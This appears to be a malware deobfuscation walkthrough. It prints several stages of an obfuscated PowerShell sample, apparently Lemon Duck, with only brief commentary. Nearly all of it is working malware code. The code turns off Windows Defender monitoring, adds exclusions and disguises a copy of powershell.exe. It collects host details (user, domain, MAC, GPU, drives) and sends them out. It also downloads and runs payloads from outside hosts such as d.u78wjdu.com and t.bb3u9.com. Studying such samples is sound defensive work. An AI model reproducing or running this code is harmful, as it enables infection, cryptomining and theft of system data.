1 gnirotinoMemitlaeImZ+ImZRelbasiD- ecnerImZ+ImZeferPpM-teS	

{yrt

}{hctac})'+'D2E,D2E(nioj-latoImZ+ImZt.etarhsah.jboE2F=rhmE2FIm'+'Z+Im'+'Z
ImZ+ImZ
pi.n'+'oi'+'tcennoc.jboE2F=pimE2F

no'+'isrev.jboE2F=vmE2F

))D2'+'Eyrammus/1/96634:1.0.0.721//:ptt'+'hD2E(AGJImZ+ImZgnirtsdao'+'lnwodAGJ.)tneilx0dcbew.ten tcex0djbo-ImZ+ImZwx0den((tcejbOezilaireseD.)rezilaireStpircSavaJ.noitazilaireS.tpircS.beW tcejbO-weN( = jboE2F

)AGJsIm'+'Z+ImZno'+'isnetxE.beW.metsySAGJ(emaNlaitImZ+ImZraPhtiWdaoL::]ylbm'+'essA.noitcelfeR['+'

{yrt

}{h'+'ctac}AGJn'+'dWAGJnioj-)}]0[))(gnirtso'+'t.epyTeviImZ+ImZrD._E2F(ImZ+ImZ+AGJ_AGJ+]0[)emaN._E2F({hcaerof ndW }))AGJ23TAFAGJ qe'+'- tamroFevirD._E2F( ro- )AGJSFTNAGJ'+' qe- tamroFevirD._E'+'2F(( dna- ))AGJkrowteN'+'AGJ qe'+'- epyTevirD._E2F( '+'ro- )AGJelbavomeRAGJ qeImZ+I'+'mZ- epyTevirD._E2'+'F(( dna'+'- )4201 tg- ecapSeerFelbaliavA._E2'+'F( dna- ydaeRsI._E2F{ erehw ndWImZ+ImZ )ImZ+ImZ(sevirDteG::'+']ofnIevirD.OI.metsys[( = evi'+'rdE2F

{yrt

bG1/musImZ+ImZmE2F=memE2F;} yticapaC._E2F =+ musmE2F { }0 = musmE2F{\% ndW yromeMImZ+ImZlacisyhP'+'_23niW imwg

AGJ)egatnecre'+'PdaoL.)rossecoImZ+ImZrP_23niW ssalCImZ+ImZ- ImZ+ImZtcejbOimW-teG((E2FAGJ = rep_'+'u'+'pcE2F

eman.)rellortnoCoediV_23'+'niW tcejbOimW-teG( = dracE2F

eman.)ro'+'ssecorp_23niwImZ+ImZ tcejboimw-teg( = emanup'+'cE2F

}sdnoceslatot._'+'E2F{hcaerofndW)tnuoCkciT::]tnemnorivne[(sd'+'nocesilliMmo'+'rF::]napsemit[ = emitpuE2F

nia'+'moD.)'+'meImZ+ImZtsysreImZ+Im'+'Ztupmoc_23niw'+' '+'tImZ+ImZcejbOimW-teG( = niamodE2FImZ'+'+ImZ

EMANRESU:'+'vneE2F = resuE2F

noisreV.bsoE2F+AGJ_AGJ+)AGImZ+ImZJAGJ,'+'AGJ swodni'+'W '+'tfosorciMA'+'GImZ+ImZJ(ecalper.noitp'+'aC.bso'+'E2F = soE2F

)metsySgnitarepO_'+'23niW ssalc- t'+'cejbOiImZ+ImZm'+'W-teG( = bsoE2'+'ImZ+ImZF

1 tImZ+ImZsrif- tcejbo-tceles ndW sserddacaM.)}eurtE2F QE- delbanepi._E2F{ erehw ndW noImZ+ImZitaImZ+ImZrugifnoCretpa'+'dAkrowteN_23niW tcejbOim'+'W-teG( = camE2F

DI'+'UU.)tcudorPmImZ+ImZetsySretupmoC_23n'+'iW tcejboimw-t'+'eg( = diugE2F

EMANRETUPMOC:vneE2'+'F = eman_pmocE2F

)AGJrotartsinimdAA'+'GJ ]ImZ+ImZeloRnItliuBswodniImZ+ImZW.lapicnirP.ytir'+'uceS[(eloRnIsI.'+'))(tnerImZ+ImZruCteG::]ytitnedIswodniW.lapicnir'+'ImZ+ImZP.ytiruceS[]'+'lapicnirPswodniW.lapicnirP.ytiruceS'+'[( = timrepE2F

AGJ/A'+'GJnioj-]'+'2..0[)AGJ/A'+'GJ(tilps.lruE'+'2F = lru_erocE2F

}AGJmoc.9u3'+'bb.t//:ptthAGJ=lruE2F{)lr'+'uE2F!(fi

AGJmocImZ+ImZ.uImZ+ImZdjw87u.d//:ptthAGJ = lru_nwodE2F
'+'
'+'

}{hctac}))AGJnibrkE2FE5qpmImZ+ImZt:vImZ+ImZnImZ+ImZeE2FAGJ(seImZ+ImZtyBl'+'ImZ+ImZlAdaeR::]eliF.OI[( ImZ+ImZ5dmg=5dmrklE2F{yrt

}{hctac}))AGJnibmE2'+'FE5qpmt:vneE2FAGJ(s'+'etyBllAdaeR::'+']eliF.OI[( 5dmg=5dmmlE2ImZ+ImZF'+'{yrt

}{hctac}))AGJnibfiE2FE5qpmt:vneE2FAGJ(setyBllAdaeR::]eliF.OI[( 5dmg=5dmfilE2F{yrt

AGJAGJ,AGJAGJ,AGJAGJ'+'=5dmrklEImZ+ImZ2F,5dmmlE2F,5dmfilE2F

emanrteg=emanerE2F

}

e'+'maneE2F ImZ+ImZnruter    

}AGJexe.llehsrewImZ+ImZopAImZ+ImZGJ=emaneE2F{))AGJemaneE2FE5qhtaprE2FAGJImZ+ImZ hta'+'p-tset(!(fi    

llun-tuondWA'+'GJemaneE2FE5qhtaprE2FA'+'GJ AGJe'+'xe.llI'+'mZ+ImZehsrewopE5qhtaprImZ+ImZ'+'E2FAGJ meti-y'+'poc    

AGJexe.AGJ + '+'))'+'6%)modnaR-teG(+6( tnu'+'oC- modnaR-ImZ+ImZteGndW)2ImZ+ImZ21..79+09..56+75..84(]][rahc[(n'+'ioj-=emaneE2F    

}    

}        

ImZ+ImZemaneImZ+ImZE2F nruter        ImZ+I'+'mZ    

{)_'+'5dmE2'+'F '+'qe- 5dmtE2F(fi        

))AGJemaneE2FE5'+'qhtaprE2'+'FA'+'GJ(setyBllAdaeR::]eliF.OI[( 5dImZ+ImZmg=_5dmE2F       ImZ+ImZ 

{)semaneE2F ni emaneE2F(hcaerof ImZ+ImZ   

))AGJexe.lle'+'hsrewopE5qh'+'taprE2FAGJ(setyBllA'+'daeR::]eliF.OI[( 5dmg = 5ImZ+I'+'mZdmtE2F    

}eman._E2F{hcaerofndWexe.llehsrewop edulcxE- exe.'+'* edulcnI- A'+'GJ*E5qhtaprE2FAGJ icg = semaneE2F    

AGJ0.1VE5qllehsrewopswodniWE5q23metsyImZ+ImZSE5qswodniWE5q:CAGJ=h'+'taprE2F    

{)(emanrteg noitcnuf

}

lE2F nruter	ImZ+ImZ

})D2E2xD2E(gnirtSoT._E2F=+lE2F{hcaerofndW)dE2F(hsaHetupmoC.)(etaerC::]5D'+'M.ImZ+ImZyhpargotpyrC.ytiruceS[	'+'

{)dE2F(5dmg noitcnuf

}

'+'AGJ31869c5772bc25ea69e32292a97d0c62AGJ=5dmgmE2F	

AGJnib.g6mAGJ=nibgmE'+'2F	

AGJ3d9aa5ImZ+ImZ5c53e66d'+'dfae7021e100a09323AGJ=5dmmE2'+'F'+'	

AGJnib.6mA'+'GJ=nibmE2F	

{)46sImZ+ImZiE2F(fi

AGJ6aaa5cad88365817f16316647dfc1a7bA'+'GJ=5dmrkE2F

AGJnib.rkAGJ=nibrkE2F

AG'+'Jf6eff1a9dd5e47ImZ+ImZ0f343207213dImZ+ImZdf9f40AGJ=5dmfiE2F

AGJnib.fiAGJ=nibfiE2F

)8 qe- ez'+'iS:ImZ+I'+'mZ:]rtPtnI[(]tni[=46siE2FImZ(( ( )'+'ImZI'+'mZNi'+'Oj-I'+'mZxImZ+]3,1[)eCnEREfERPesOBR'+'EvTwE]GnirTS[( (. '(( ( )'x'+]31[DILlehS$+]1[diLlEHs$ (&" ; [ARRay]::Reverse( $k8n3D) ;  ( " $( sV 'ofS' '') " + [sTRing]( $k8n3D) +" $(set-variAbLe  'Ofs' ' ' )")

This seems to be obsfucated code.

So Let’s try to deobsfucate the script.

Stage 2

The payload we obatained is

( ((' .( ([STrinG]EwTvE'+'RBOsePREfEREnCe)[1,3]+ZmIxZm'+'I-jO'+'iNZm'+'IZmI'+') ( ((ZmIF2Eis64=[int]([IntPtr]:Zm'+'I+ZmI:Si'+'ze -eq 8)

F2Eifbin=JGAif.binJGA

F2Eifmd5=JGA04f9fdZmI+ZmId312702343f0ZmI+ZmI74e5dd9a1ffe6fJ'+'GA

F2Ekrbin=JGAkr.binJGA

F2Ekrmd5=JG'+'Ab7a1cfd74661361f71856388dac5aaa6JGA

if(F2EiZmI+ZmIs64){

F2Embin=JG'+'Am6.binJGA

'+'F'+'2Emmd5=JGA32390a001e1207eafd'+'d66e35c5ZmI+ZmI5aa9d3JGA

F2'+'Emgbin=JGAm6g.binJGA

F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA'+'

}

function gmd5(F2Ed){

'+'[Security.CryptographyZmI+ZmI.M'+'D5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}

ZmI+ZmIreturn F2El

}

function getrname(){

    F2Erpat'+'h=JGAC:q5EWindowsq5ESZmI+ZmIystem32q5EWindowspowershellq5EV1.0JGA

    F2Eenames = gci JGAF2Erpathq5E*JG'+'A -Include *'+'.exe -Exclude powershell.exeWdnforeach{F2E_.name}

    F2EtmdZm'+'I+ZmI5 = gmd5 ([IO.File]::Read'+'AllBytes(JGAF2Erpat'+'hq5Epowersh'+'ell.exeJGA))

   ZmI+ZmI foreach(F2Eename in F2Eenames){

 ZmI+ZmI       F2Emd5_=gmZmI+ZmId5 ([IO.File]::ReadAllBytes(JG'+'AF'+'2Erpathq'+'5EF2EenameJGA))

        if(F2Etmd5 -eq'+' F'+'2Emd5'+'_){

    Zm'+'I+ZmI        return F2EZmI+ZmIenameZmI+ZmI

        }

    }

    F2Eename=-joi'+'n([char[]](48..57+65..90+97..12ZmI+ZmI2)WdnGetZmI+ZmI-Random -Co'+'unt (6+(Get-Random)%6'+'))'+' + JGA.exeJGA

    cop'+'y-item JGAF2E'+'ZmI+ZmIrpathq5EpowersheZmI+Zm'+'Ill.ex'+'eJGA JG'+'AF2Erpathq5EF2EenameJG'+'AWdnout-null

    if(!(test-p'+'ath ZmI+ZmIJGAF2Erpathq5EF2EenameJGA)){F2Eename=JGZmI+ZmIApoZmI+ZmIwershell.exeJGA}

    returnZmI+ZmI F2Eenam'+'e

}

F2Erename=getrname

F2Elifmd5,F2Elmmd5,F2ZmI+ZmIElkrmd5='+'JGAJGA,JGAJGA,JGAJGA

try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}

try{'+'FZmI+ZmI2Elmmd5=gmd5 ([IO.File]'+'::ReadAllByte'+'s(JGAF2Eenv:tmpq5EF'+'2EmbinJGA))}catch{}

try{F2Elkrmd5=gmd5ZmI+ZmI ([IO.File]::ReadAlZmI+ZmI'+'lBytZmI+ZmIes(JGAF2EeZmI+ZmInZmI+ZmIv:tZmI+ZmImpq5EF2EkrbinJGA))}catch{}

'+'
'+'
F2Edown_url = JGAhttp://d.u78wjdZmI+ZmIu.ZmI+ZmIcomJGA

if(!F2Eu'+'rl){F2Eurl=JGAhttp://t.bb'+'3u9.comJGA}

F2Ecore_url = F2'+'Eurl.split(JG'+'A/JGA)[0..2'+']-joinJG'+'A/JGA

F2Epermit = (['+'Security.Principal.WindowsPrincipal'+'][Security.PZmI+ZmI'+'rincipal.WindowsIdentity]::GetCurZmI+ZmIrent())'+'.IsInRole([Secu'+'rity.Principal.WZmI+ZmIindowsBuiltInRoleZmI+ZmI] JG'+'AAdministratorJGA)

F2Ecomp_name = F'+'2Eenv:COMPUTERNAME

F2Eguid = (ge'+'t-wmiobject Wi'+'n32_ComputerSysteZmI+ZmImProduct).UU'+'ID

F2Emac = (Get-W'+'miObject Win32_NetworkAd'+'apterConfigurZmI+ZmIatiZmI+ZmIon Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firsZmI+ZmIt 1

FZmI+ZmI'+'2Eosb = (Get-W'+'mZmI+ZmIiObjec'+'t -class Win32'+'_OperatingSystem)

F2Eos = F2E'+'osb.Ca'+'ption.replace(JZmI+ZmIG'+'AMicrosoft'+' W'+'indows JGA'+',JGAJZmI+ZmIGA)+JGA_JGA+F2Eosb.Version

F2Euser = F2Eenv'+':USERNAME

ZmI+'+'ZmIF2Edomain = (Get-WmiObjecZmI+ZmIt'+' '+'win32_computZ'+'mI+ZmIersystZmI+ZmIem'+').Dom'+'ain

F2Euptime = [timespan]::Fr'+'omMillisecon'+'ds([environment]::TickCount)Wdnforeach{F2E'+'_.totalseconds}

F2Ec'+'puname = (get-wmiobject ZmI+ZmIwin32_process'+'or).name

F2Ecard = (Get-WmiObject Win'+'32_VideoController).name

F2Ecp'+'u'+'_per = JGAF2E((Get-WmiObjectZmI+ZmI -ZmI+ZmIClass Win32_PrZmI+ZmIocessor).LoadP'+'ercentage)JGA

gwmi Win32_'+'PhysicalZmI+ZmIMemory Wdn %{F2Emsum = 0} { F2Emsum += F2E_.Capacity };F2Emem=F2EmZmI+ZmIsum/1Gb

try{

F2Edr'+'ive = ([system.IO.DriveInfo]'+'::GetDrives(ZmI+ZmI) ZmI+ZmIWdn where {F2E_.IsReady -and (F'+'2E_.AvailableFreeSpace -gt 1024) -'+'and ((F'+'2E_.DriveType -Zm'+'I+ZmIeq JGARemovableJGA) -or'+' (F2E_.DriveType -'+'eq JGA'+'NetworkJGA)) -and ((F2'+'E_.DriveFormat -eq '+'JGANTFSJGA) -or (F2E_.DriveFormat -'+'eq JGAFAT32JGA))} Wdn foreach{(F2E_.Name)[0]+JGA_JGA+ZmI+ZmI(F2E_.DrZmI+ZmIiveType.t'+'ostring())[0]})-joinJGAWd'+'nJGA}catc'+'h{}

try{

'+'[Reflection.Asse'+'mbly]::LoadWithParZmI+ZmItialName(JGASystem.Web.Extensi'+'onZmI+Z'+'mIsJGA)

F2Eobj = (New-Object Web.Script.Serialization.JavaScriptSerializer).DeserializeObject((ned0xwZmI+ZmI-objd0xect net.webcd0xlient).JGAdownl'+'oadstringZmI+ZmIJGA(E2Dh'+'ttp://127.0.0.1:43669/1/summaryE'+'2D))

F2Emv=F2Eobj.versi'+'on

F2Emip=F2Eobj.connect'+'io'+'n.ip
ZmI+ZmI
Z'+'mI+Z'+'mIF2Emhr=F2Eobj.hashrate.tZmI+ZmIotal-join(E2D,E2D'+')}catch{}

try{

Set-MpPrefeZmI+ZmIrence -DisableRZmI+ZmIealtimeMonitoring 1

Add-MpPre'+'ference -ExclusionPath c:q5E

Add-MpPreference -ExclusiZmI+ZmIonProcess c:q5Ewindowsq5Esystem32q5EWindowsPowerShellZmI+ZmIq5Ev1.0q5EpZmI+ZmIowershell.exeZmI+ZmI

    Add-MZmI+ZmIpPreference -ExclusionProcess c:q5Ew'+'indowsq5Esystem32q5ZmI+ZmIEWindowsPoweZmI+ZmIrShellq5Ev1.0q5EF2EreZmI+ZmIname

ZmI+ZmI}'+'catch{}
ZmI+ZmI
i'+'f((F2Ecar'+'d'+' -match ZmI+ZmIJGAGTXWdnNVIDIAWdnGEFORCEJGA)){F2Eisn=1}

if((F2Ecard -match JGARadeonWdnAMDJGA)){F2Eisa=1}

F2Ev=F2Eurl.split(JGA?JGA)[1]

F2Eparams'+'=@(F2Ev,F2Ecomp_name,F2EguiZmI'+'+ZmId,F2Emac)-joinJGA&JGA

set-locaZmI+'+'ZmItion F2Eenv:tmp

functZmI+ZmIion sZmI+ZmItp(F2E'+'gra){

    write-host '+'FZmI+ZmI2Egra

Start-Process -File'+'Path cmd.exe -ArgumentLi'+'st JGA/c F2EgraJGA

}

function gcf(F2ZmI+Zm'+'IEcode,F2Emd,F2Efn){

('+'E'+'2Decho E2D+F2Ecode+E2'+'D;F2Eifmd5=E2DE2DE2D+F2Emd+E2DE2DE2D;F2Eifp=F2'+'Eenv:tmp+EZmI+ZmI2DE2Dq5EE2D+F2Efn+E2DE2DE2D;F2Edown_url=ZmI+ZmIE2DE2DEZmI+ZmI2D+F2EdowZmI+'+'ZmIn_url+E2DE2'+'DE2DZmI+ZmI;function gmd5(F2Econ){[System.Security.Cryptography.MD5]::Create().C'+'omput'+'eHash(F2EZmI+ZmIcon)Wdnforeach{F2Es+=F2E_.ToString(E2DE2Dx2E2DE2D)};r'+'eturn F2ZmI+ZmIEs}if(test-path F2Eifp){F2Econ_=[System.IO.File]::ReadAllBytes(F2Eifp)'+';F2Emd'+'5_=gmd5 F2Econ_;if(F2Emd5_-eqF2Eifmd5){F2Enoup'+'=1}}if(!F2Enoup){F2Econ=(Ned0xw-Objd0xect NetZm'+'I+ZmI.WebCd0xlient).downloaddata(ZmI+ZmIF2Edown_u'+'rl+E2DZ'+'mI+ZmIE2D/E2D+F2Efn+E2D?E2D+F2Epara'+'ms'+'+E2DE2DE2D);F2Et=gmd5 F2Econ;if(F2Et'+'-eqF2Eifmd5){[System'+'.IO.Fil'+'e]::WriteAZmI+ZmIllBytes(F2Eifp,F2Econ)}elZmI'+'+ZmIse{F2Enoup=1}ZmI+ZmI}if(ZmI'+'+Z'+'mIF2Enoup){F2Econ=F2Eco'+'n_;F2Eifmd5=F2Emd5_}E2D).replace(E2DW'+'dnE2D,E2D^^^WdnE2D).replac'+'e(E2D&E2D,E2D^^^&E2DZmI+ZmI'+')

}

function gpa(F2Efnam,F'+'2Ename){

(E2Dfor(F2EiZmI+'+'ZmI=0;F2Ei -lt F2Econ.co'+'untZmI+Zm'+'I-1;F2Ei+=1){if(F2E'+'con[F2Ei] -eq '+'0x0'+'a){breaZmI+ZmIk}};id0xex(-join[char[]]'+'F2Ec'+'on[0..F2Ei]);F2Ebin=(NewZmI+ZmI-Object IO.B'+'inaryReader(New-Object System.IO.CoZmI+ZmImpression'+'.GzipStream (New-ObZmI+ZmIje'+'ct System.IO.MemoryS'+'tream(,F2Econ[(F2Ei+1)..(F2Econ.count)])), Zm'+'I+ZmI([IO.Compr'+'ession.CompressionMode]::Decompress))).ReadBytes(10000000)ZmI+ZmI;F2Ebin_=F2Ebin.Clone();F2Emep=F2Een'+'v:tmp+ZmI+ZmIE2DE2DE2D+JGAZmI+ZmIq5EF2Efnam.oriJGA+E2DE2DE2D;[System.IO.File]::Wr'+'iteAllByt'+'es(F2Emep,F2Ebin_+(('+'1..127)WdnGet-Random -Count 100));test1'+' -PEBytes F2EbinE2D'+').replace(E2DWdnE2D,E2D^^^WdnE2D'+')'+'.re'+'place(E2D&ZmI+ZmIE2D'+',E2D^^^&E2D)+JGAWdnFZmI+ZmI2Ename - &cmd /c copy /y %tmpZmI+ZmI%q5EF2Efnam.ori %tmp%q5EF2Efnam.exe & %tmp%q5EF2Efnam.exeJGA

}

'+'funcZmI+ZmItion gpb(F2EnameZ'+'mI+ZmI){

'+'    E2DId0'+'xEX(-join[char[]]F2Econ)W'+'dnE2D+F2Ename'+'+E2D -E2D

}

function gcode(F2Efl) '+'{

E2Dtry{F2ElocalE2D+F2Efl+E2D=F2Efl'+'ase;N'+'ew-Object Threading.Mutex(F2Etrue,E2DE2DGlobalq5EeLocal'+'E2D+F2Efl+E2DE2DE2D,[ref]F2ElocalE2D+F2Efl+'+'E2D)}catch{}E2D

}

F2E'+'ZmI+ZmIcode1'+'=gcode JGAIfJGA

Id0xEx F2Ecode1

if(F2ElocalIf){

stZmI+ZmIp ((gcf F2Ecode1 F2EifmdZmI+ZmI5 F2Eifbin)+(gpb F2Erename))

}

i'+'f(F2Eis64){

F2EZmI+ZmIc'+'ZmI+ZmIode2=gcode JGATMnJGA

Id0xEx F2Ecode2

ifZm'+'I+ZmI(F2'+'ElocalTMn){

stp ((gcf F2Ecode2 F2Em'+'mZmI+ZmId5 F2Embin)+(g'+'p'+'a F2Embin'+' F2E'+'rename))

'+'}

}

'+'if((F2Eisn -or F2Eisa) -and F2Eis64){
'+'
F2Ecode3=gcode JGATMngJGZmI+ZmIA

Id0xEx F'+'2Ecode3

if(F2ElocalTMng){

stp ((gcf F2Ecode3 F2Emgmd5 F2Emgbin)+(gpa F2Emg'+'binZmI+ZmI F2Ere'+'name))

}

}

F2Ecode4=gcod'+'ZmI+ZmIe JGAKrJGA

Id0xE'+'x F2Ecode4

if'+'(F2El'+'ocalK'+'r){

stp ((gcf F2Ecode4 F2Ekrmd5 F2Ekrbin)+(gpb ZmI+ZmIF2Erename))

}

stp (ZmI+ZmIE2Decho try{F2E'+'s=[System.NeZ'+'mI+ZmIt'+'.Sockets'+'.TcpListener]65529;'+'F2Es.start();while(1){}}catch{}Wd'+'nE2D+F2ErenZmI+ZmIame+E2D -E2D)

F2E'+'conf_f=test-pa'+'th c:q5Ewindowsq5Esystem32q5EWindowsPowerShZmI+ZmIellq5Ev1.0q5EconfiZmI+ZmIgXXX1'+'.'+'json

F2'+'Elmip=[System'+'.Net.Dns]::GetHo'+'stAddresses(JGAp.b69'+'kq.comJGA) Wdn foreach {echo F2E_.IPAddressToString }

F2Etpid,F2Etpna'+'me=(ge'+'ZmI+Z'+'mIt-ZmI+ZmIprocessWdnsort cpu -Des'+'cendinZmI+ZmI'+'gWdnselect-objectZmI+ZmI -first'+' 1WdnforeZmI+ZmIach{F2E_.id,FZmI+ZmI2E_.processnam'+'e})

F2Etcpconn = NetStat -anop'+' TCP

F2Eipport=JGAJGA

foreach(F2Et in F2Etcpconn){

    F2Elin'+'e = F2Et.'+'sZmI+ZmIplit(E2D E2D)Wdn ? {F2E'+'_}

    if'+' (F2ElineZ'+'mI+ZmI -eq FZmI+ZmI2Enull) '+'{ continue }

 '+'   if(F2Et.contains(JGAESTABLISHEDJGA) -and (F2Eline[-1] -eq F2'+'Etpid)){

        F2Eipport = F2Eline[2]

        break'+'

    }

}

try{(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).SetDNSServerSearchOrder'+'(@(E2DZmI+ZmI8.8.8.8E2D,ZmI+ZmIE2'+'D'+'9.9'+'.9.9'+'E2D))}catch{}

F2EparZmI+ZmIams+=J'+'GA'+'&JGA+(@(FZmI+ZmI2Eos,[Int]F2Eis64,F2EZmI+ZmIuser,F2Edomain,F2EZmI+ZmIdrive,F2Ecpuname,F2Ec'+'ardZmI'+'+ZmI,F2Emem,F2Ecpu'+'_per,[InZmI+ZmItZmI+ZmI]F2Epermi'+'t,(ZmI+ZmIF2Elifmd5ZmI+ZmI[0..5]'+'-joZmI+ZmIinJGAJGA),(F2Elmmd5[ZmI+ZmI0..5]-joinJGAJGA),(F2Elk'+'rmdZmI+ZmI5[0..ZmI+ZmI5]-joinJGAJGA),F2ZmI+ZmIEmv,F2Emip,F2EmhrZmI+ZmI,F2EuptimZmI+Z'+'mIe,[Int]F2'+'Ec'+'onf_f,F2Elmip,F2EtpnaZmI+ZmIme,F2Eip'+'port,JGA0.9JGA)-joinJGA&JGA)

function SIEX {  

Param(

[string]F2Eurl

)

try{

F2Ewebclient = Ned0xw-Objd0xect Net.WebCd0xlient

F2Efinalurl ='+' JGAF2EurlJGA+JGA?JGA+JGAF2Eparam'+'sJGA

ZmI+ZmItry{

F2EwebclientZmI+ZmI.Headers.add(JGAUser-AgentJGA,JGALemon-Duck-JGA+F2ELemon_Duck.reZmI+ZmIplace(E2DZmI+ZmIq5EE2D,E2D-E2'+'D))

} catch{}

F2Eres_bytes = F2Ewebclient.DownloadData(ZmI+ZmIF2Efinalurl)

if(F2Eres_bytes.count -gt 173){

F2Esign_bytes = F2EresZmI+ZmI_bytes[0..171];

ZmI+Zm'+'IF2Eraw_byteZmI+ZmIs = F2Eres_bytes'+'[173..F2Eres_bytes.count];

'+'F2ZmI'+'+ZmIErsaParams'+' ='+' New-Object System.Security.C'+'rypt'+'ographZm'+'I+ZmIy.RSAParameters

F2Er'+'sa'+'Params.Modulus = '+'0xda,0x65,0xa8,0xdZmI+ZmI7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,Z'+'mI+ZmI0'+'xff,0x'+'2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,'+'0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,'+'0xcd,'+'0x37,0x6b,0xf3,0'+'x4f,0x3b,0x62,0x70,0x86,0x07'+',0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xd'+'c,0x88,0xbf,0x35,0xf2,0x92,0xee'+',0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xZmI+ZmId1,0x'+'19,0x'+'30,0x73,0xc6,0x52,0x01,0xcd,0'+'xe7,0xc7,0xZmI+ZmI34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0'+'xcd,0x79,0x40,0xa7,0x91,0x6a,0x'+'ae,0x95,0'+'x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a'+',0x98,0xdb,0x97,0x3f,0xf6ZmI+ZmI,0x2e,0x95,0x10,0x'+'72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xZmI+ZmIea,0x38,0xb7,0x47,0x6b,0x5d

F2ErZmI+ZmIsaParams'+'.ExponZmI+ZmIent = 0x01,0x00,0x01

F2ErsZmI+ZmIa = New-Object -TyZmI+ZmIpeName System.Security.Cryptography.RSACryptoS'+'erviceProvider;

F2Ersa.ImportPZmI+ZmIarameters(F2'+'ErsaParams)
'+'
FZm'+'I+ZmI2EbasZmI+ZmIe64 = -join([cha'+'r[]]F2EZmI+ZmIsign_bytes)

F2EbyteArray = [convert]::FromBase64Stri'+'ng(F'+'2Ebase64)

F2Esha1 = New-Object Sys'+'t'+'ZmI+ZmIem.SecuZmI+ZmIrity.Cryptography.SH'+'A1CryptoServi'+'ceProvider

if(F2Ersa.verifyData(F'+'2'+'Eraw_bytes,F2Esha1,F2EbyteArray)) {

IZmI'+'+ZmIEX (-jo'+'in[char[]]F2Eraw_bytes)

}

}

} c'+'atch{}

}

StartZmI+ZmI-Sleep -Seconds 3

SIEX JGAF2Ecore_url/report.jspJGA

Zm'+'I)-rEplAcE ([cHaR]87+[cHaR]100+'+'[cHaR]110),[cHaR]124 -rEplAcEZmIE2DZmI,[cHaR]39 -r'+'EplAcE ([cHaR]70+[cHaR]50+'+'[cHaR]69),[cHaR]36-c'+'rEPLAcE([cHaR]100+[cHaR]4'+'8+[cHaR'+']12'+'0),[cHaR]96-crEPLAcEZmIJGAZmI,'+'[cHaR]34 -rEplAcE ([cHa'+'R]113+[cHaR]'+'53+[cHaR]69),[cHaR]92) ) 

')  -CRePlACE 'ZmI',[chaR]39 -repLACE 'EwT',[chaR]36))

We got some familiar looking code but still its obfuscated, so lets deobsfucate the code again.

Stage 3

The deobsfucated Code we got with us is ⬇️ this,

( (('F2Eis64=[int]([IntPtr]:'+':Size -eq 8)

F2Eifbin=JGAif.binJGA

F2Eifmd5=JGA04f9fd'+'d312702343f0'+'74e5dd9a1ffe6fJGA

F2Ekrbin=JGAkr.binJGA

F2Ekrmd5=JGAb7a1cfd74661361f71856388dac5aaa6JGA

if(F2Ei'+'s64){

F2Embin=JGAm6.binJGA

F2Emmd5=JGA32390a001e1207eafdd66e35c5'+'5aa9d3JGA

F2Emgbin=JGAm6g.binJGA

F2Emgmd5=JGA26c0d79a29223e96ae52cb2775c96813JGA

}

function gmd5(F2Ed){

[Security.Cryptography'+'.MD5]::Create().ComputeHash(F2Ed)Wdnforeach{F2El+=F2E_.ToString(E2Dx2E2D)}

'+'return F2El

}

function getrname(){

    F2Erpath=JGAC:q5EWindowsq5ES'+'ystem32q5EWindowspowershellq5EV1.0JGA

    F2Eenames = gci JGAF2Erpathq5E*JGA -Include *.exe -Exclude powershell.exeWdnforeach{F2E_.name}

    F2Etmd'+'5 = gmd5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5Epowershell.exeJGA))

   '+' foreach(F2Eename in F2Eenames){

 '+'       F2Emd5_=gm'+'d5 ([IO.File]::ReadAllBytes(JGAF2Erpathq5EF2EenameJGA))

        if(F2Etmd5 -eq F2Emd5_){

    '+'        return F2E'+'ename'+'

        }

    }

    F2Eename=-join([char[]](48..57+65..90+97..12'+'2)WdnGet'+'-Random -Count (6+(Get-Random)%6)) + JGA.exeJGA

    copy-item JGAF2E'+'rpathq5Epowershe'+'ll.exeJGA JGAF2Erpathq5EF2EenameJGAWdnout-null

    if(!(test-path '+'JGAF2Erpathq5EF2EenameJGA)){F2Eename=JG'+'Apo'+'wershell.exeJGA}

    return'+' F2Eename

}

F2Erename=getrname

F2Elifmd5,F2Elmmd5,F2'+'Elkrmd5=JGAJGA,JGAJGA,JGAJGA

try{F2Elifmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EifbinJGA))}catch{}

try{F'+'2Elmmd5=gmd5 ([IO.File]::ReadAllBytes(JGAF2Eenv:tmpq5EF2EmbinJGA))}catch{}

try{F2Elkrmd5=gmd5'+' ([IO.File]::ReadAl'+'lByt'+'es(JGAF2Ee'+'n'+'v:t'+'mpq5EF2EkrbinJGA))}catch{}

F2Edown_url = JGAhttp://d.u78wjd'+'u.'+'comJGA

if(!F2Eurl){F2Eurl=JGAhttp://t.bb3u9.comJGA}

F2Ecore_url = F2Eurl.split(JGA/JGA)[0..2]-joinJGA/JGA

F2Epermit = ([Security.Principal.WindowsPrincipal][Security.P'+'rincipal.WindowsIdentity]::GetCur'+'rent()).IsInRole([Security.Principal.W'+'indowsBuiltInRole'+'] JGAAdministratorJGA)

F2Ecomp_name = F2Eenv:COMPUTERNAME

F2Eguid = (get-wmiobject Win32_ComputerSyste'+'mProduct).UUID

F2Emac = (Get-WmiObject Win32_NetworkAdapterConfigur'+'ati'+'on Wdn where {F2E_.ipenabled -EQ F2Etrue}).Macaddress Wdn select-object -firs'+'t 1

F'+'2Eosb = (Get-Wm'+'iObject -class Win32_OperatingSystem)

F2Eos = F2Eosb.Caption.replace(J'+'GAMicrosoft Windows JGA,JGAJ'+'GA)+JGA_JGA+F2Eosb.Version

F2Euser = F2Eenv:USERNAME

